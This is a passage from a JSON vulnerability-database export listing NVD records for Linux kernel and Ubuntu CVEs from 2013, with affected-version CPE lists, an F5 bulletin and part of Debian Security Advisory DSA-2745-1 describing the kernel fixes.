"cpe:/o:linux:linux_kernel:3.9.6", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.9.2", "cpe:/o:linux:linux_kernel:3.9.0", "cpe:/o:linux:linux_kernel:3.9.8", "cpe:/o:linux:linux_kernel:3.4.28", "cpe:/o:linux:linux_kernel:3.6.7", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.4.7", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:3.8.0", "cpe:/o:linux:linux_kernel:3.4.25", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.7.4", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.0.52", "cpe:/o:linux:linux_kernel:3.0.51", "cpe:/o:linux:linux_kernel:3.8.6", "cpe:/o:linux:linux_kernel:3.0.48", "cpe:/o:linux:linux_kernel:3.0.54", "cpe:/o:linux:linux_kernel:3.7.9", "cpe:/o:linux:linux_kernel:3.9.4", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.9.7", "cpe:/o:linux:linux_kernel:3.4.31", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.7.1", "cpe:/o:linux:linux_kernel:3.6.4", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.6.2", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:3.6.8", "cpe:/o:linux:linux_kernel:3.8.2", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.4.11"], "id": "CVE-2013-2232", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2232", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.9:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.0.53:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.68:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.8.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.47:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.59:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.62:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.45:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.66:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.0.54:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.49:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.64:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.51:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.61:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.55:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.57:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.60:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.56:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.48:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.50:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.63:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.52:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.46:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.65:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.58:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.67:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:06:48", "description": "A certain Ubuntu build procedure for perf, as distributed in the Linux kernel packages in Ubuntu 10.04 LTS, 12.04 LTS, 12.10, 13.04, and 13.10, sets the HOME environment variable to the ~buildd directory and consequently reads the system configuration file from the ~buildd directory, which allows local users to gain privileges by leveraging control over the buildd account.", "edition": 4, "cvss3": {}, "published": "2013-09-25T10:31:00", "title": "CVE-2013-1060", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1060"], "modified": "2013-10-02T04:23:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:13.10", "cpe:/o:canonical:ubuntu_linux:12.10", "cpe:/o:canonical:ubuntu_linux:10.04", "cpe:/o:canonical:ubuntu_linux:13.04"], "id": "CVE-2013-1060", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1060", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:13.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:13.04:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:10.04:-:lts:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:-:lts:*:*:*:*:*"]}], "f5": [{"lastseen": "2020-04-06T22:39:24", "bulletinFamily": "software", "cvelist": ["CVE-2013-2140"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2018-09-26T05:03:00", "published": "2018-09-26T05:03:00", "id": "F5:K48726314", "href": "https://support.f5.com/csp/article/K48726314", "title": "Linux kernel vulnerability CVE-2013-2140", "type": "f5", "cvss": {"score": 3.8, "vector": "AV:A/AC:M/Au:S/C:N/I:P/A:P"}}], "debian": [{"lastseen": "2019-05-30T02:23:01", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2234", "CVE-2013-2852", "CVE-2013-4162", "CVE-2013-1059", "CVE-2013-2148", "CVE-2013-2232", "CVE-2013-2851", "CVE-2013-4163", "CVE-2013-2237", "CVE-2013-2164"], "description": "- ----------------------------------------------------------------------\nDebian Security Advisory DSA-2745-1 security@debian.org\nhttp://www.debian.org/security/ Dann Frazier\nAugust 28, 2013 http://www.debian.org/security/faq\n- ----------------------------------------------------------------------\n\nPackage : linux\nVulnerability : privilege escalation/denial of service/information leak\nProblem type : local/remote\nDebian-specific: no\nCVE Id(s) : CVE-2013-1059 CVE-2013-2148 CVE-2013-2164 CVE-2013-2232\n CVE-2013-2234 CVE-2013-2237 CVE-2013-2851 CVE-2013-2852\n CVE-2013-4162 CVE-2013-4163\nDebian Bug : 701744\n\nSeveral vulnerabilities have been discovered in the Linux kernel that may lead\nto a denial of service, information leak or privilege escalation. The Common\nVulnerabilities and Exposures project identifies the following problems:\n\nCVE-2013-1059\n\n Chanam Park reported an issue in the Ceph distributed storage system.\n Remote users can cause a denial of service by sending a specially crafted\n auth_reply message.\n\nCVE-2013-2148\n\n Dan Carpenter reported an information leak in the filesystem wide access\n notification subsystem (fanotify). Local users could gain access to\n sensitive kernel memory.\n\nCVE-2013-2164\n\n Jonathan Salwan reported an information leak in the CD-ROM driver. A\n local user on a system with a malfunctioning CD-ROM drive could gain\n access to sensitive memory.\n\nCVE-2013-2232\n\n Dave Jones and Hannes Frederic Sowa resolved an issue in the IPv6\n subsystem. Local users could cause a denial of service by using an\n AF_INET6 socket to connect to an IPv4 destination.\n\nCVE-2013-2234\n\n Mathias Krause reported a memory leak in the implementation of PF_KEYv2\n sockets. Local users could gain access to sensitive kernel memory.\n\nCVE-2013-2237\n\n Nicolas Dichtel reported a memory leak in the implementation of PF_KEYv2\n sockets. Local users could gain access to sensitive kernel memory.\n\nCVE-2013-2851\n\n Kees Cook reported an issue in the block subsystem. Local users with\n uid 0 could gain elevated ring 0 privileges. This is only a security\n issue for certain specially configured systems.\n\nCVE-2013-2852\n\n Kees Cook reported an issue in the b43 network driver for certain Broadcom\n wireless devices. Local users with uid 0 could gain elevated ring 0 \n privileges. This is only a security issue for certain specially configured\n systems.\n\nCVE-2013-4162\n\n Hannes Frederic Sowa reported an issue in the IPv6 networking subsystem.\n Local users can cause a denial of service (system crash).\n\nCVE-2013-4163\n\n Dave Jones reported an issue in the IPv6 networking subsystem. Local\n users can cause a denial of service (system crash).\n\nThis update also includes a fix for a regression in the Xen subsystem.\n\nFor the stable distribution (wheezy), these problems has been fixed in version\n3.2.46-1+deb7u1.\n\nThe following matrix lists additional source packages that were rebuilt for\ncompatibility with or to take advantage of this update:\n\n Debian 7.0 (wheezy)\n user-mode-linux 3.2-2um-1+deb7u2\n\nWe recommend that you upgrade your linux and user-mode-linux packages.\n\nNote: Debian carefully tracks all known security issues across every\nlinux kernel package in all releases under active security support.\nHowever, given the high frequency at which low-severity security\nissues are discovered in the kernel and the resource requirements of\ndoing an update, updates for lower priority issues will normally not\nbe released for all kernels at the same time. Rather, they will be\nreleased in a staggered or &quot;leap-frog&quot; fashion.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2013-08-29T05:16:38", "published": 